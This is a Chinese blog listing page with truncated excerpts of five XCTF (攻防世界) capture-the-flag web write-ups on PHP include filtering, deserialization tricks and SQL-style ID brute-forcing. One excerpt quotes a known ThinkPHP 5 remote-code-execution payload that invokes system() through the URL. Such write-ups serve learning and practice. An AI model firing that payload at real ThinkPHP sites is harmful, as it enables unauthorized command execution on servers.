自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(5)
  • 收藏
  • 关注

原创 攻防世界web进阶_Web_php_include

代码审计<?phpshow_source(__FILE__);echo $_GET['hello'];$page=$_GET['page'];while (strstr($page, "php://")) {//循环,如果匹配到php://就将其替换成空字符串 $page=str_replace("php://", "", $page);}include($page);?>分析源码可知伪协议php://被过滤了,但是可以用其他的伪协议cat flag文件.php

2020-08-21 19:13:30 168

原创 攻防世界web进阶_php_rce

上网查一下ThinkPHP v5,发现有rce漏洞找到网上的payload:/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir看看上级目录http://220.249.52.133:37949/?s=index/\think\app/invokefunction&function=call_user_func_array&v

2020-08-21 13:14:16 316

原创 攻防世界web进阶_Web_php_unserialize

攻防世界web进阶_Web_php_unserialize解题思路打开之后是一段代码审计<?phpclass Demo {private $file = 'index.php';public function __construct($file) {$this->file = $file;//构造函数 把里面的参数变成传进来的参数}function __destruct() {echo @highlight_file($this->file, true);}func

2020-08-21 11:20:15 686 1

原创 攻防世界web进阶_unserialize3

攻防世界_web进阶区_unserialize3点进去是这样不完整的代码,f12查看一下源码和网络中消息头有没有信息,发现没有class xctf{//类public $flag = '111';//public变量为111public function __wakeup(){//如果执行了wakeup方法就exitexit('bad requests');}?code=//传参我们先试试序列化后的对象字符串传进去是啥反应可以自己写个php代码将所给的类序列化为字符串序列化后的字符串为O

2020-08-21 09:01:50 172

原创 攻防世界ics-06

首先进去之后乱点点,发现报表中心有东西看见url后面id=1,初步判断是sql注入,结果后来发现啥也没有,所以就直接burp爆破id,发现2333处长度不一样找到flag

2020-07-01 22:13:43 207

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除